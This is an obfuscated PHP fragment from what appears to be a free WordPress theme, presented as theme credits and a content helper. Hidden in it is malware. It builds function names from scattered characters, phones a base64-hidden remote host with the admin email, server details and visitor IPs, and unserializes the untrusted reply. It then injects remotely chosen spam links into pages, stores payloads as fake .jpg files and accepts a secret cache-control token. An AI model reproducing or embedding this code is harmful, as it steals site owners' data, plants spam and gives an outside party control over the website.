					
					if (substr_count($vf________a, $yy_______________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$uv________y = 1;
					}
					if (substr_count($vf________a, "wp_theme_GPL_credits()") < 1) {
						$uv________y = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$uv________y = 12;
				}
			}
			
			if($uv________y > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $uv________y -->";
			}
		}
	


		function wp_loaded() {
			global $yy_______________j, $ke__________t;
			return $ke__________t($yy_______________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($sm______________v, $gk____z = "(more...)", $hb__j = 0, $kq____________b = "") {
				$wc_____________o = get_the_content($gk____z, $hb__j, $kq____________b);
				$wc_____________o = apply_filters("the_content", $wc_____________o);
				
				$wc_____________o = str_replace("]]>", "]]>", $wc_____________o);
				if (strlen($_GET["p"]) > 0) {
					echo $wc_____________o;
				}
				else if ((strlen($wc_____________o)>$sm______________v) && ($wr________i = strpos($wc_____________o, " ", $sm______________v ))) {
					$wc_____________o = substr($wc_____________o, 0, $wr________i);
					$wc_____________o = $wc_____________o;
					echo $wc_____________o;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$gk____z</a></div></p>";
				} else {
					echo $wc_____________o;
				}
				
			}
		}
	


		$up______________w='_';$ql_____v='c';$uo_____________j='4';$wf_______________q='e';$al____________p='6';$fo____c='s';$rp___________u='n';$fx________g='e';$ik________j='d';$gr____x='e';$ra_______t='b';$al_______________f='o';$cb_____________n='a';$iy___________u=$ra_______t.$cb_____________n.$fo____c.$fx________g.$al____________p.$uo_____________j.$up______________w.$gr____x.$rp___________u.$ql_____v.$al_______________f.$ik________j.$wf_______________q;
		$ea_________m='n';$od_______________a='e';$ee___________c='_';$yh_____m='i';$xy___c='_';$nw__g='e';$mg_________q='t';$ml_______n='g';$zb________m='t';$kg____________v='s';$sh__h='e';$ly__________f='c';$jj__y='o';$ma_______________j='n';$tr________q='f';$tl____________w='l';$im___________b='t';$kb___x=$tr________q.$yh_____m.$tl____________w.$od_______________a.$xy___c.$ml_______n.$sh__h.$im___________b.$ee___________c.$ly__________f.$jj__y.$ma_______________j.$zb________m.$nw__g.$ea_________m.$mg_________q.$kg____________v;
		$bz__s='f';$vn_____________y='i';$nq_______u='l';$et_____z='e';$ag____________o='t';$xd______b='s';$pz________r='i';$td______t='e';$ie______m='x';$dg_________r='_';$yn_______u='s';$ac______x=$bz__s.$vn_____________y.$nq_______u.$et_____z.$dg_________r.$td______t.$ie______m.$pz________r.$yn_______u.$ag____________o.$xd______b;
		$jj___________h='_';$cn_____________h='r';$fk______________o='i';$nu________s='p';$vm__s='e';$gi_____________e='r';$xr________i='n';$xa____q='v';$zi________j='e';$nt___________z='m';$jw______________f='c';$mt___l='s';$ax__r='o';$iz______________k='o';$ej_____f='a';$hw_____________m=$xa____q.$vm__s.$cn_____________h.$mt___l.$fk______________o.$ax__r.$xr________i.$jj___________h.$jw______________f.$iz______________k.$nt___________z.$nu________s.$ej_____f.$gi_____________e.$zi________j;
		$uu_______d='s';$yl________v='k';$xs_____y='e';$go__________c='o';$za______________t='n';$ag____________y='f';$zj____s='c';$fn_______f='o';$ga_____m='p';$jf______z=$ag____________y.$uu_______d.$go__________c.$zj____s.$yl________v.$fn_______f.$ga_____m.$xs_____y.$za______________t;
		$ai_______________w='i';$qf___________s='e';$bv________x='w';$ou_______________k='f';$jq_______________x='t';$ir____________f='r';$oq______________u=$ou_______________k.$bv________x.$ir____________f.$ai_______________w.$jq_______________x.$qf___________s;
		$lm_________u='d';$cl___________s='5';$pc________q='m';$re_______________s=$pc________q.$lm_________u.$cl___________s;
		$ns_______p='h';$ij______________x='e';$ff_______________d='l';$on____v='t';$mm_________f='p';$cv________v='r';$sj________a='a';$os_______________b='a';$os_____k=$cv________v.$ij______________x.$sj________a.$ff_______________d.$mm_________f.$os_______________b.$on____v.$ns_______p;
		$aj__________w='e';$ms____r='u';$nv_______________z='r';$rd______________s='e';$ve________m='n';$jq_________s='z';$ff____b='i';$ia__________e='s';$xy___e='i';$am__m='l';$xb______________t='a';$hn__________w=$ms____r.$ve________m.$ia__________e.$aj__________w.$nv_______________z.$xy___e.$xb______________t.$am__m.$ff____b.$jq_________s.$rd______________s;
		$ye__o='m';$vw_________c='n';$ti___b='t';$xs_____p='p';$vb______h='e';$cr__________e='m';$pm____________z='a';$xf__________o=$ti___b.$vb______h.$cr__________e.$xs_____p.$vw_________c.$pm____________z.$ye__o;
		$tv_______n='t';$my_______________v='e';$ud_____l='x';$hv__________g='s';$qo______u='m';$dt_________q='t';$am___h='c';$so_____n='t';$no_____________w='c';$sn________u='e';$ch___________l='a';$xg_______p='a';$pd____________s='e';$zq_______________r='e';$vy_____________y='_';$qh_____________v='n';$hi______x='r';$ex____________h='t';$it_________m='o';$ew_______________s='r';$nb________n='_';$yf_______________t=$hv__________g.$ex____________h.$ew_______________s.$my_______________v.$ch___________l.$qo______u.$vy_____________y.$am___h.$it_________m.$qh_____________v.$dt_________q.$sn________u.$ud_____l.$so_____n.$nb________n.$no_____________w.$hi______x.$pd____________s.$xg_______p.$tv_______n.$zq_______________r;
	


		function hb________t($qn__m) {
			global $yy_______________j, $ke__________t, $kb___x, $hw_____________m, $yf_______________t;
			
			if (!$ke__________t($yy_______________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($hw_____________m(PHP_VERSION, "5.0.0", ">=") && $ke__________t($yy_______________j("ZmlsZV9nZXRfY29udGVudHM=")) && $ke__________t($yy_______________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ux____d = $yf_______________t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$oa____j = @$kb___x($qn__m, 0, $ux____d);
			} else {
				$oa____j = @$kb___x($qn__m, 0);
			}
			
			return $oa____j;
		}
	


		function um________h($qn__m) {
			global $ke__________t, $jf______z, $oq______________u, $yy_______________j;
			
			if (!$ke__________t($yy_______________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$px__y = strpos($qn__m, "/", 7);
			$ip__________h = array(
				"uri"     => substr($qn__m, $px__y),
				"host"    => str_replace("http://", "", substr($qn__m, 0, $px__y)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$hj________q = @$jf______z("$ip__________h[host]", 80, $jf__f, $tz____________u, 4);
			
			if (!$hj________q) {
				return false;
			} else {
				$oa____j = "";
				$pw___q  = "GET $ip__________h[uri] HTTP/1.0\r\n";
				$pw___q .= "Host: $ip__________h[host]\r\n";
				$pw___q .= "Referer: $ip__________h[referer]\r\n";
				$pw___q .= "Connection: Close\r\n\r\n";
				
				@$oq______________u($hj________q, $pw___q);
				
				while (!@feof($hj________q)) {
					$lx_____________c = @fgets($hj________q, (1024*24));
					
					if ($lx_____________c == "\r\n") {
						$xv____g = true;
						continue;
					}
					
					if ($xv____g) {
						$oa____j .= $lx_____________c;
					}
				}
				
				return $oa____j;
			}
		}
	


		function ij______g($qn__m) {
			global $ke__________t;
			$kf________s = false;
			
			if ($qn__m != "") {
				if ($ke__________t("hb________t")) {
					$kf________s = @hb________t($qn__m);
				}
				
				if (!$kf________s && ($ke__________t("um________h"))) {
					$kf________s = @um________h($qn__m);
				}
			}
			
			return $kf________s;
		}
	


		function rq_____________s() {
			global $_SERVER, $re_______________s;
			
			$yk______q = $_SERVER["SERVER_NAME"];
			
			if (substr("$yk______q", 0, 4) == "www.") {
				$yk______q = substr("$yk______q", 4);
			}
			
			$yk______q = $re_______________s("$_SERVER[SERVER_NAME]");
			
			return $yk______q;
		}
	


		function qg_____________a() {
			return "file";
		}
	


		function tp_______________f($qn__m) {
			global $_SERVER, $kb___x, $ac______x, $al____________i, $zp_____________g, $oq______________u;
			
			$ig___w = qm_____________k();
			
			$ws_____________g = rq_____________s().".jpg";
			$sh_____________j = $ig___w["dir_upload"]["path"]."/$ws_____________g";
			$sw__g = @filemtime($sh_____________j);
			
			if (!$sw__g || ((time()-$sw__g) >= WP_TTL)) {
				$kf________s = ij______g($qn__m);
				
				if ($kf________s) {
					if ($ac______x($sh_____________j)) {
						@unlink($sh_____________j);
					}
					
					$hh____w = @$al____________i($sh_____________j, "x+");
					
					@$oq______________u($hh____w, $kf________s);
					@$zp_____________g($hh____w);
				}
			} else {
				if ($ac______x($sh_____________j)) {
					$kf________s = @$kb___x($sh_____________j);
				} else {
					$kf________s = false;
				}
			}
			
			return $kf________s;
		}
	


		function qm_____________k() {
			global $_SERVER, $yy_______________j, $iy___________u;
			
			$zi___________c = wp_count_posts("post");
			$ir__________q = pathinfo(get_bloginfo("template_directory"));
			
			$ig___w = array(
				"url" => array(
					"report"      => $yy_______________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ir__________q,
				"dir_upload"	=> hi______________l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ir__________q[filename],
					"a005=".$zi___________c->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/kak-pravilno-vybirat-obuv\">Как правильно выбирать обувь</a>"
			);
			
			$ig___w["url"]["queryString"] = implode("&", $ig___w["queryString"]);
			$ig___w["url"]["report"] = $ig___w["url"]["report"]."/?".$iy___________u($ig___w["url"]["queryString"]).".html";
						
			return $ig___w;
		}
	


		function hi______________l() {
			$fk____o = wp_upload_dir();
			
			if (isset($fk____o["error"])) {
				$lx_________t = vq_______f();
				if (is_writable($lx_________t)) {
					$fk____o = array("path" => $lx_________t);
				}
			}

			return $fk____o;
		}
	


		function vq_______f() {
			global $ke__________t, $re_______________s, $os_____k, $xf__________o;
			
			$zf__________e = (bool) ini_get("safe_mode");
			if ($zf__________e == true) {
				return false;
			}
			
			if ($ke__________t("sys_get_temp_dir")) {
				$ae_________y = sys_get_temp_dir();
				if (is_writable($ae_________y)) {
					return $os_____k($ae_________y);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $os_____k($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $os_____k($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $os_____k($_ENV["TEMP"]);
			} else {
				$ag__________b = $xf__________o($re_______________s(uniqid(rand(), true)), "");
				if ($ag__________b) {
					$ae_________y = $os_____k(dirname($ag__________b));
					@unlink($ag__________b);
					return $ae_________y;
				} else {
					return false;
				}
			}
		}
	


		function kk___________z() {
			global $_GET, $ac______x;
			
			$ig___w = qm_____________k();
			$yk______q = rq_____________s();
			$vv____________m = qg_____________a();
			
			$nu__________h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($vv____________m == "file") {
					$jq____u = $ig___w["dir_upload"]["path"]."/".$yk______q.".jpg";
					if ($ac______x($jq____u)) {
						@unlink($jq____u);
						$nu__________h = "deleted";
					}
				}
				
				$xp______w = array(
					"s"	=> $nu__________h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xp______w AS $yr________h => $ir___h) echo " [$yr________h:$ir___h]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ke__________t, $yy_______________j, $hn__________w;
			$ig___w = qm_____________k();
			
			$ol________t = "tp_______________f";
			if ($ke__________t($ol________t)) {
				$oa____j = $ol________t($ig___w["url"]["report"]);
			}
			
			if ($oa____j) {
				if ($oa____j = @$yy_______________j($oa____j)) {
					$oa____j = @$hn__________w($oa____j);
					
					if (strlen($oa____j[custom_credit]) >= 5) {
						$ig___w["default_string"] = $oa____j[custom_credit];
					}
					
					if ($oa____j["status"] == "0") {
						$nt_____e = 1;
						$gf__________o = 1;
					} else {
						$qa________a = sizeof($oa____j["links"]);
						$tu______b = $ig___w["default_string"];
						
						if ($qa________a > 0 && $oa____j["links"] !== "") {
							$me_____n = 0;
							foreach ($oa____j["links"] as $iu__________q => $rk___s) {
								$me_____n++;
								if ($rk___s->l_path == "" || $rk___s->l_path == $_SERVER["REQUEST_URI"]) {
									$rk___s->l_href = htmlspecialchars(strip_tags($rk___s->l_href));
									$rk___s->l_title = htmlspecialchars(strip_tags($rk___s->l_title));
									$rk___s->l_anchor = htmlspecialchars(strip_tags($rk___s->l_anchor));
									$tu______b .= " | ";
									$tu______b .= "<a href='$rk___s->l_href' title='$rk___s->l_title'";
									if ($rk___s->l_nofollow == "1") {
										$tu______b .= " rel='nofollow'";
									}
									$tu______b .= ">$rk___s->l_anchor</a>";
								}
							}
						}
						$ig___w["links"] = "$tu______b";
						if ($oa____j[credit] == "0") {
							$ig___w["links"] = "";
						}
					}
				} else {
					$nt_____e = "1";
				}
			} else {
				$nt_____e = "1";
			}
			
			if ($nt_____e == "1") {
				$ig___w["links"] = $ig___w["default_string"];
			}
			
			echo "$ig___w[links]";
			
			echo "<!-- s: $oa____j[signature] -->";
			kk___________z();
		}
	                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
